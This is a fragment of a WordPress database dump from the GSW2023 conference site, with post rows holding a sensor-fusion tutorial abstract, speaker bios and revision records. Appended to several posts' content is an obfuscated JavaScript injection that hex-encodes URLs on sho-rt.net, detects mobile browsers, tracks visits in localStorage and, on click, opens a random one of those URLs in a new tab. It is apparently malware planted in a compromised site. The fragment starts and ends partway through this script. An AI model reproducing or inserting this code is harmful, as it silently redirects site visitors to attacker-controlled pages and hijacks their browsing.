_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-02 02:51:15','2023-04-02 02:51:15','',3066,'https://gsw2023.com/?p=4009',0,'revision','',0),
(4010,1,'2023-04-02 03:41:06','2023-04-02 03:41:06','[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"4011\" img_size=\"1200x1000\"][vc_column_text]\r\n<h5><strong><span style=\"font-size: 10pt;\">Instructor</span></strong></h5>\r\n<h6><strong><span style=\"font-size: 10pt;\">Speaker: Dr. Mohamed M.R. Mostafa</span></strong></h6>\r\n<h6><strong><span style=\"font-size: 10pt;\">Duration: 3 hours</span></strong></h6>\r\n<h6><strong><span style=\"font-size: 10pt;\">Location: ISPRS GSW 2023 – Cairo</span></strong></h6>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"107\"][vc_column_text]<span style=\"font-size: 14pt;\"><strong><u>Speaker’s Bio</u></strong></span>\r\n<p style=\"text-align: justify;\">Dr. Mohamed M.R. Mostafa is the Lead Technical Authority, Mobile Mapping at Trimble Applanix. Dr.\r\nMostafa obtained his Ph.D. in geomatics engineering from The University of Calgary, Canada in 1999. He\r\nhas 24 years of experience in system design, development, integration, calibration, and quality control\r\nfor airborne, land, and indoor surveying and autonomy applications. He has managed and delivered\r\nprojects in the United States, Canada, Europe, Africa, and the Middle East and has contributed to more\r\nthan 250 technical publications, including the Manual of Photogrammetry 5th edition and the DEM User\r\nManual. He served at the ISPRS, ASPRS, and FIG in different capacities in the last 25 years. He received\r\n11 international awards in the last 30 years.</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text]\r\n<h1 class=\"fancy-title entry-title start-animation-done start-animation\">Sensor Fusion for Mapping and Navigation</h1>\r\n<h5><span style=\"text-align: justify;\"><strong>Tutorial Topic</strong></span></h5>\r\n<h5><strong>Abstract:</strong></h5>\r\n<p style=\"text-align: justify;\"><strong>Integrated Sensors enable both Surveying and Autonomy technologies. Self-driving vehicles R&amp;amp;D has been evolving over the past decade. Self-driving depends on several integrated technologies including high-definition mapping &amp;amp; map-based localization. The art and science of mapping along with national and international standards and specifications have resulted in adequate quality mapping products especially in the civilized part of the world for construction, infrastructure, and transportation networks but not satisfactory enough for more critical precision needed for autonomous driving. The developing part of the world lacks the existence of many mapping products let alone high-definition maps.\r\nTherefore, on one hand, the lack of high-definition maps might be an obstacle for self-driving vehicle development.\r\nOn the other hand, sensor technology has significantly evolved in the past few decades. Including:\r\n. Multi-head cameras using oblique/nadir components\r\n. Outstanding LiDAR systems and radar sensors\r\n. The evolution of GPS into GNSS that integrated satellite positioning systems from around the globe\r\n. The evolution of inertial sensor technology due to their successful use in the automotive industry to trigger airbags and even their implementation in cellular phones that led to smaller,lighter weight, higher accuracy, and more economical Inertial measuring units IMU’s.\r\nReaping the benefits of these evolving technologies to address the high-definition mapping challenges is the main scope of this proposed session. Designed to be informative, educational, and interactive, the workshop is designed to address the following Audience categories:\r\n. Decision Makers\r\n. Technicians, Technologists, and Engineers Students\r\nThe workshop will start by addressing the ‘here and now’ technological challenges and their associated solutions as well as the future technological development plans to address that. First, the technological </strong><strong>evolution of film into digital cameras, GPS into GNSS, laser profilers into LiDAR systems, INS into IMU,</strong><strong>etc. will be addressed including the algorithmic evolution of aerotriangulation, SLAM, direct georeferencing (DG) and integrated sensor orientation (ISO). The benefits of integrating all the aforementioned technologies in the form of simultaneous adjustment and mapping (SAM). Then, it will address the integration mechanisms of imaging, LiDAR, radar, inertial and GNSS into not onlygeoreferencing an image or LiDAR range but to also leveraging the precise LiDAR ranges and image pixels to improve the precision of the trajectory in post-processing and real time modes.</strong></p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Sensor Fusion for Mapping and Navigation','','publish','closed','closed','','sensor-fusion-for-mapping-and-navigationto-be-conferred','','','2023-08-16 21:33:30','2023-08-16 21:33:30','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=4010',0,'dt_portfolio','',0),
(4011,1,'2023-04-02 03:39:03','2023-04-02 03:39:03','','What-is-Sensor-Fusion-1-1024x538','','inherit','open','closed','','what-is-sensor-fusion-1-1024x538','','','2023-04-02 03:39:03','2023-04-02 03:39:03','',4010,'https://gsw2023.com/wp-content/uploads/2023/04/What-is-Sensor-Fusion-1-1024x538-1.png',0,'attachment','image/png',0),
(4012,1,'2023-04-02 03:41:06','2023-04-02 03:41:06','','Sensor Fusion for Mapping and Navigation(to be conferred)','','inherit','closed','closed','','4010-revision-v1','','','2023-04-02 03:41:06','2023-04-02 03:41:06','',4010,'https://gsw2023.com/?p=4012',0,'revision','',0),
(4013,1,'2023-04-02 03:42:54','2023-04-02 03:42:54','','Sensor Fusion for Mapping and Navigation(to be confermed)','','inherit','closed','closed','','4010-revision-v1','','','2023-04-02 03:42:54','2023-04-02 03:42:54','',4010,'https://gsw2023.com/?p=4013',0,'revision','',0),
(4024,1,'2023-04-02 07:01:29','2023-04-02 07:01:29','<!-- wp:paragraph -->\n<p>Prof. Nashwa El-Bendary received her Ph.D. in information technology from the Faculty of Computers and Artificial Intelligence, Cairo University - Egypt in 2008. From 2013 to 2015, she was the Head of Business Information Systems (BIS) department with the College of Management and Technology, and from 2016 to 2018, she was the Vice-Dean of graduate studies and scientific research with the College of Computing and Information Technology.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Since October 2020, Prof. Nashwa El-Bendary has been the Dean of the College of Computing and Information Technology (South Valley – Aswan) at the Arab Academy for Science, Technology, and Maritime Transport (AASTMT), also she has been the Director of China-Arab States Technology Transfer Center (CASTTC) at the AASTMT, since 2016 till present.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Prof. El-Bendary is the author of many scientific articles published in indexed and highly ranked international journals and conference proceedings. Her research interests include Artificial Intelligence, Machine Learning, Pattern Recognition, Image and Signal Processing, and Data Analytics. She currently participates in several international research/mobility projects with the Erasmus+ program funded by the European Union and technology transfer projects funded by the Chinese Ministry of Science and Technology (MOST) program for Arab Countries. Prof. El-Bendary is the recipient of the UNESCO-ALECSO Award for creativity and technical innovation for young researchers in 2014, and the L’Oréal-UNESCO for Women in Science Fellowship in 2015, a member in the Organization for Women in Science for the Developing World (OWSD) since 2016, an editorial board member in the Elsevier Applied Soft Computing Journal since 2017, a member of the ICT committee of the Technical Support, Monitoring and Impact Assessment Office (TSMIAO) – Egyptian Academy of Scientific Research and Technology (ASRT) since October 2019, and an IEEE Senior member since June 2019.</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 